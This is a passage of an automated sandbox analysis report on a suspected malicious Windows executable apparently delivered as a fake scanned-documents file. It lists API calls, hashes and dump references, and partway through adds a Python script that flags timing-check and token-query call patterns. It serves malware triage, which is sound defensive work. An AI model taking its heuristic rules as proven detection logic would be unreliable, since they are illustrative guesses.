                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002BCDE9
                                                        • Part of subcall function 002B3820: RtlAllocateHeap.NTDLL(00000000,?,00351444,?,0029FDF5,?,?,0028A976,00000010,00351440,002813FC,?,002813C6,?,00281129), ref: 002B3852
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 002BCE0F
                                                      • _free.LIBCMT ref: 002BCE22
                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002BCE31
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                      • String ID:
                                                      • API String ID: 336800556-0
                                                      • Opcode ID: 69fcaf51d8af4d91b78464069526e58523550eccb82c465f15b617079dc2835d
                                                      • Instruction ID: c454af3b7956c94bb66bf581038cc7d766dc1f2d967126e3faa173f5506a2158
                                                      • Opcode Fuzzy Hash: 69fcaf51d8af4d91b78464069526e58523550eccb82c465f15b617079dc2835d
                                                      • Instruction Fuzzy Hash: 1F01FC72621216BF23221A766C4CCFB796DDEC6BE13254129FD05CB200DA60CD2181B0
                                                      APIs
                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00299693
                                                      • SelectObject.GDI32(?,00000000), ref: 002996A2
                                                      • BeginPath.GDI32(?), ref: 002996B9
                                                      • SelectObject.GDI32(?,00000000), ref: 002996E2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ObjectSelect$BeginCreatePath
                                                      • String ID:
                                                      • API String ID: 3225163088-0
                                                      • Opcode ID: 8a76d80f5c940757b979a7b61f11fe2e9b62402ea50898f1e79e547143b454f4
                                                      • Instruction ID: 4ba9e368be124139fce1628bcec1a10c77329cb993986e4e4794ce10b72d8908
                                                      • Opcode Fuzzy Hash: 8a76d80f5c940757b979a7b61f11fe2e9b62402ea50898f1e79e547143b454f4
                                                      • Instruction Fuzzy Hash: 9F217C71822306EBDF129F68EC187E93BADBB15366F10421AF411A61B0D3709CA1CFD4
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _memcmp
                                                      • String ID:
                                                      • API String ID: 2931989736-0
                                                      • Opcode ID: e4fab2ad3e61f6fcef76e195aecee63f1213b0540fb3750056cef85f34b6af00
                                                      • Instruction ID: d65da8d015d5309d5ad4920e7316e8f41baea832f5b68c903284793cbb2582b9
                                                      • Opcode Fuzzy Hash: e4fab2ad3e61f6fcef76e195aecee63f1213b0540fb3750056cef85f34b6af00
                                                      • Instruction Fuzzy Hash: 4501B9616F5665FFD60D99129D52FFBB35C9B253A8F804020FD049A241FB70ED7086E0
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,?,002AF2DE,002B3863,00351444,?,0029FDF5,?,?,0028A976,00000010,00351440,002813FC,?,002813C6), ref: 002B2DFD
                                                      • _free.LIBCMT ref: 002B2E32
                                                      • _free.LIBCMT ref: 002B2E59
                                                      • SetLastError.KERNEL32(00000000,00281129), ref: 002B2E66
                                                      • SetLastError.KERNEL32(00000000,00281129), ref: 002B2E6F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_free
                                                      • String ID:
                                                      • API String ID: 3170660625-0
                                                      • Opcode ID: 9bbee01be2fb40b6fcf37767969ba880dadddb8943d0a00aecc3b70091d10168
                                                      • Instruction ID: 1b6e45929fed9f8ee2538c3f6388592edee0ce67ae083b99e9f0be861e88673c
                                                      • Opcode Fuzzy Hash: 9bbee01be2fb40b6fcf37767969ba880dadddb8943d0a00aecc3b70091d10168
                                                      • Instruction Fuzzy Hash: 6F01F936175701E7C6136B366C45DEB255DABC93E5B245428F825A2193EE74EC294420
                                                      APIs
                                                      • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,002DFF41,80070057,?,?,?,002E035E), ref: 002E002B
                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002DFF41,80070057,?,?), ref: 002E0046
                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002DFF41,80070057,?,?), ref: 002E0054
                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002DFF41,80070057,?), ref: 002E0064
                                                      • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002DFF41,80070057,?,?), ref: 002E0070
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                      • String ID:
                                                      • API String ID: 3897988419-0
                                                      • Opcode ID: f05363758b8675f20c756b8a669f1b786d66f466027521327b8df2136c887aff
                                                      • Instruction ID: 1f0528a041ff9d1d08f0166bf7380a8c98de00af331b1d546876190740f7de6a
                                                      • Opcode Fuzzy Hash: f05363758b8675f20c756b8a669f1b786d66f466027521327b8df2136c887aff
                                                      • Instruction Fuzzy Hash: DE01F2726A0214BFDB119F6ADC84BEA7AEDEF48351F149024F805D2210D7B0DD818BA0
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 002EE997
                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 002EE9A5
                                                      • Sleep.KERNEL32(00000000), ref: 002EE9AD
                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 002EE9B7
                                                      • Sleep.KERNEL32 ref: 002EE9F3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                      • String ID:
                                                      • API String ID: 2833360925-0
                                                      • Opcode ID: 4a525413fa4918045d71455d56743affc875730e1b218a20e1bd6f1dfdf632d9
                                                      • Instruction ID: 9581e8cbf32d1dafc75f0d54fdb8bc537e48e7217f34c25287c8951366327458
                                                      • Opcode Fuzzy Hash: 4a525413fa4918045d71455d56743affc875730e1b218a20e1bd6f1dfdf632d9
                                                      • Instruction Fuzzy Hash: 2B015B31CA1629EBCF009FE6D849AEDBBB8BB0C300F414556E502B2242DB309564CBA2
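Each record on this page lists one function's direct API calls in program order, so the order itself is evidence: the record above shows QueryPerformanceCounter, Sleep, then QueryPerformanceCounter again, the shape of an execution-timing check, and later records show GetTokenInformation queried twice around a heap allocation. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses records in this "APIs" / "Similarity" layout and flags ordered call patterns. The sample excerpt is constructed from lines shown on this page, and the rule labels and patterns are this example's own assumptions, not sandbox signatures.

```python
"""Parse Joe Sandbox-style function records and flag ordered API call patterns.

Added example, not Joe Sandbox code. The rules are the example's own heuristics.
"""
import re

# Constructed excerpt in the report's layout, assembled from records on this page
# and trimmed to the lines the parser cares about.
SAMPLE = """\
APIs
• QueryPerformanceCounter.KERNEL32(?), ref: 002EE997
• QueryPerformanceFrequency.KERNEL32(?), ref: 002EE9A5
• Sleep.KERNEL32(00000000), ref: 002EE9AD
• QueryPerformanceCounter.KERNEL32(?), ref: 002EE9B7
• Sleep.KERNEL32 ref: 002EE9F3
Memory Dump Source
• Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 002E102A
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 002E1036
• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002E1045
• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 002E104C
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002E1062
Memory Dump Source
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 002BCDC6
  • Part of subcall function 002B3820: RtlAllocateHeap.NTDLL(00000000,?), ref: 002B3852
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002BCE31
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
"""

BULLET = "•"


def parse_call(line):
    """Parse one '• Name.MODULE(args), ref: ADDR' line into a dict, or return None.

    Args may contain nested parentheses such as '00000003(TokenIntegrityLevel)', so
    the line is split at the trailing ' ref: ' rather than matched with a regex.
    'Part of subcall function' lines belong to a callee and are skipped so they do
    not pollute the caller's own call order.
    """
    body = line.strip()
    if not body.startswith(BULLET):
        return None
    body = body[len(BULLET):].strip()
    if body.startswith("Part of subcall function"):
        return None
    head, sep, ref = body.rpartition(" ref: ")
    if not sep or not re.fullmatch(r"[0-9A-Fa-f]{6,16}", ref.strip()):
        return None
    head = head.rstrip(",").strip()
    name_mod, _, rest = head.partition("(")
    api, _, module = name_mod.partition(".")
    args = rest[:-1] if rest.endswith(")") else rest  # '' when the line has no parens
    return {"api": api, "module": module, "args": args, "ref": int(ref, 16)}


def parse_records(text):
    """Split report text into function records, one per 'APIs' header.

    The 'API ID' line from the Similarity block names the record when present.
    """
    records, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = {"api_id": None, "calls": []}
            records.append(current)
            continue
        if current is None:
            continue
        if stripped.startswith(BULLET + " API ID:"):
            current["api_id"] = stripped.split(":", 1)[1].strip()
            continue
        call = parse_call(line)
        if call:
            current["calls"].append(call)
    return records


def in_order(seq, pattern):
    """True if every name in pattern occurs in seq in that order (gaps allowed)."""
    it = iter(seq)
    return all(name in it for name in pattern)


# Assumed heuristics for this example: ordered subsequences of a function's own calls.
RULES = [
    ("execution timing: QueryPerformanceCounter brackets Sleep",
     ["QueryPerformanceCounter", "Sleep", "QueryPerformanceCounter"]),
    ("token inspection: GetTokenInformation", ["GetTokenInformation"]),
    ("screen sampling: GetForegroundWindow/GetDC/GetPixel",
     ["GetForegroundWindow", "GetDC", "GetPixel"]),
]


def triage(text):
    """Map each matching record's API ID (or first call address) to its rule hits."""
    out = {}
    for rec in parse_records(text):
        names = [c["api"] for c in rec["calls"]]
        hits = [label for label, pattern in RULES if in_order(names, pattern)]
        if hits:
            key = rec["api_id"] or (f"{rec['calls'][0]['ref']:08X}" if rec["calls"] else "?")
            out[key] = hits
    return out


if __name__ == "__main__":
    for key, hits in triage(SAMPLE).items():
        print(key, "->", "; ".join(hits))
```

To run this over a full report, save the page as text and pass it to triage() in place of SAMPLE. Records that only free memory or walk environment strings, like the third one in the sample, produce no hits; that is the intended behaviour, since the value of the pass is in surfacing the handful of functions whose call order suggests timing, token or screen probing rather than listing everything.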
                                                      APIs
                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002E1114
                                                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,002E0B9B,?,?,?), ref: 002E1120
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,002E0B9B,?,?,?), ref: 002E112F
                                                      • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,002E0B9B,?,?,?), ref: 002E1136
                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002E114D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 842720411-0
                                                      • Opcode ID: e09eeaaae4cf56be96f97e3d3c91725021da546030a8cf62892edf023d5bdfb6
                                                      • Instruction ID: 46468df91520c7587c5a265339e8e189ac66b0166d39b441e4a230e95c12c3e6
                                                      • Opcode Fuzzy Hash: e09eeaaae4cf56be96f97e3d3c91725021da546030a8cf62892edf023d5bdfb6
                                                      • Instruction Fuzzy Hash: 2A011D79190305BFDB124F65DC49AAA3B6EEF89360F504425FA45D7350DA71DC209A60
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002E0FCA
                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002E0FD6
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002E0FE5
                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002E0FEC
                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002E1002
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 44706859-0
                                                      • Opcode ID: a45507611feb5c47382ccb99f35c38c00a49283d8f931ea74f9ac8b85a1b8271
                                                      • Instruction ID: c2bbbee82488da5b6d2d00ba9194c43daabcbfa28e10b4be98862e74641aa373
                                                      • Opcode Fuzzy Hash: a45507611feb5c47382ccb99f35c38c00a49283d8f931ea74f9ac8b85a1b8271
                                                      • Instruction Fuzzy Hash: 7BF0AF39190301BBD7220FA5DC49F963B6EEF8D761F518824F905C6290CA30DC508A60
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 002E102A
                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 002E1036
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002E1045
                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 002E104C
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002E1062
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 44706859-0
                                                      • Opcode ID: e547aeca7234cf3b0eb658f8b7b5e7b3e072d6a34e02e5fc65707f948397f183
                                                      • Instruction ID: 7bfd906871ae4d6627bfc8b42dc237b4194c59e7b7e6657845b264df309f2682
                                                      • Opcode Fuzzy Hash: e547aeca7234cf3b0eb658f8b7b5e7b3e072d6a34e02e5fc65707f948397f183
                                                      • Instruction Fuzzy Hash: 77F0CD39290312FBDB221FA5EC48F963BAEEF8D761F514424FE05C7250CA30D8608A60
                                                      APIs
                                                      • CloseHandle.KERNEL32(?,?,?,?,002F017D,?,002F32FC,?,00000001,002C2592,?), ref: 002F0324
                                                      • CloseHandle.KERNEL32(?,?,?,?,002F017D,?,002F32FC,?,00000001,002C2592,?), ref: 002F0331
                                                      • CloseHandle.KERNEL32(?,?,?,?,002F017D,?,002F32FC,?,00000001,002C2592,?), ref: 002F033E
                                                      • CloseHandle.KERNEL32(?,?,?,?,002F017D,?,002F32FC,?,00000001,002C2592,?), ref: 002F034B
                                                      • CloseHandle.KERNEL32(?,?,?,?,002F017D,?,002F32FC,?,00000001,002C2592,?), ref: 002F0358
                                                      • CloseHandle.KERNEL32(?,?,?,?,002F017D,?,002F32FC,?,00000001,002C2592,?), ref: 002F0365
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID:
                                                      • API String ID: 2962429428-0
                                                      • Opcode ID: adbd946d2b480d3bebe3d0493ce268e8f1af1ff0cc7b8cc7d909bfa0016b29de
                                                      • Instruction ID: 8e8728f3e52d46628387a3ffe3e808ef19f2249cf12acbb4071e792f7235e29f
                                                      • Opcode Fuzzy Hash: adbd946d2b480d3bebe3d0493ce268e8f1af1ff0cc7b8cc7d909bfa0016b29de
                                                      • Instruction Fuzzy Hash: 4801A276810B1A9FC7309F66D8C0826F7F9BF503553158A7FD29652932C371A964CF80
                                                      APIs
                                                      • _free.LIBCMT ref: 002BD752
                                                        • Part of subcall function 002B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,002BD7D1,00000000,00000000,00000000,00000000,?,002BD7F8,00000000,00000007,00000000,?,002BDBF5,00000000), ref: 002B29DE
                                                        • Part of subcall function 002B29C8: GetLastError.KERNEL32(00000000,?,002BD7D1,00000000,00000000,00000000,00000000,?,002BD7F8,00000000,00000007,00000000,?,002BDBF5,00000000,00000000), ref: 002B29F0
                                                      • _free.LIBCMT ref: 002BD764
                                                      • _free.LIBCMT ref: 002BD776
                                                      • _free.LIBCMT ref: 002BD788
                                                      • _free.LIBCMT ref: 002BD79A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 974b096d3aa4a92c6f8be5c5dc76853de5c8d8665bd962b99fb5246a61e7278e
                                                      • Instruction ID: 84c926d33b6bf9d1d0bcc1be2c96401f056c9dc49eeb8da3e4a24729b6f5d03b
                                                      • Opcode Fuzzy Hash: 974b096d3aa4a92c6f8be5c5dc76853de5c8d8665bd962b99fb5246a61e7278e
                                                      • Instruction Fuzzy Hash: 94F04F36561705FB8662EF64F9C5CD6B7DDBB05390BA42C05F048DB502DF20FC908A64
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003E9), ref: 002E5C58
                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 002E5C6F
                                                      • MessageBeep.USER32(00000000), ref: 002E5C87
                                                      • KillTimer.USER32(?,0000040A), ref: 002E5CA3
                                                      • EndDialog.USER32(?,00000001), ref: 002E5CBD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                      • String ID:
                                                      • API String ID: 3741023627-0
                                                      • Opcode ID: 8c011cb415c32820d56a1f75fb4164ac65a44fb65f4bbe77a960ef6a434427fb
                                                      • Instruction ID: fc54a1593124c729a7751ed707dda0953a4def768c714a0d8ead758bee56611f
                                                      • Opcode Fuzzy Hash: 8c011cb415c32820d56a1f75fb4164ac65a44fb65f4bbe77a960ef6a434427fb
                                                      • Instruction Fuzzy Hash: 1501D6305B0B14ABEB215B11DD5EFE677BCBF08B09F44215AB183A10E1DBF4A994CB90
                                                      APIs
                                                      • _free.LIBCMT ref: 002B22BE
                                                        • Part of subcall function 002B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,002BD7D1,00000000,00000000,00000000,00000000,?,002BD7F8,00000000,00000007,00000000,?,002BDBF5,00000000), ref: 002B29DE
                                                        • Part of subcall function 002B29C8: GetLastError.KERNEL32(00000000,?,002BD7D1,00000000,00000000,00000000,00000000,?,002BD7F8,00000000,00000007,00000000,?,002BDBF5,00000000,00000000), ref: 002B29F0
                                                      • _free.LIBCMT ref: 002B22D0
                                                      • _free.LIBCMT ref: 002B22E3
                                                      • _free.LIBCMT ref: 002B22F4
                                                      • _free.LIBCMT ref: 002B2305
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: c4896b857bf0557211a9c4d7f2419d51be18e0de38f5d8dac2034a74dc683ef7
                                                      • Instruction ID: 1632eab2241c9f0b71ab934b71e7f82167b6eebe0fbc6d7dedfba4a95507985a
                                                      • Opcode Fuzzy Hash: c4896b857bf0557211a9c4d7f2419d51be18e0de38f5d8dac2034a74dc683ef7
                                                      • Instruction Fuzzy Hash: 15F05474421710DB8757AF54BC019983B6CF719792F152E06F418D6271CB3118259FE5
                                                      APIs
                                                      • EndPath.GDI32(?), ref: 002995D4
                                                      • StrokeAndFillPath.GDI32(?,?,002D71F7,00000000,?,?,?), ref: 002995F0
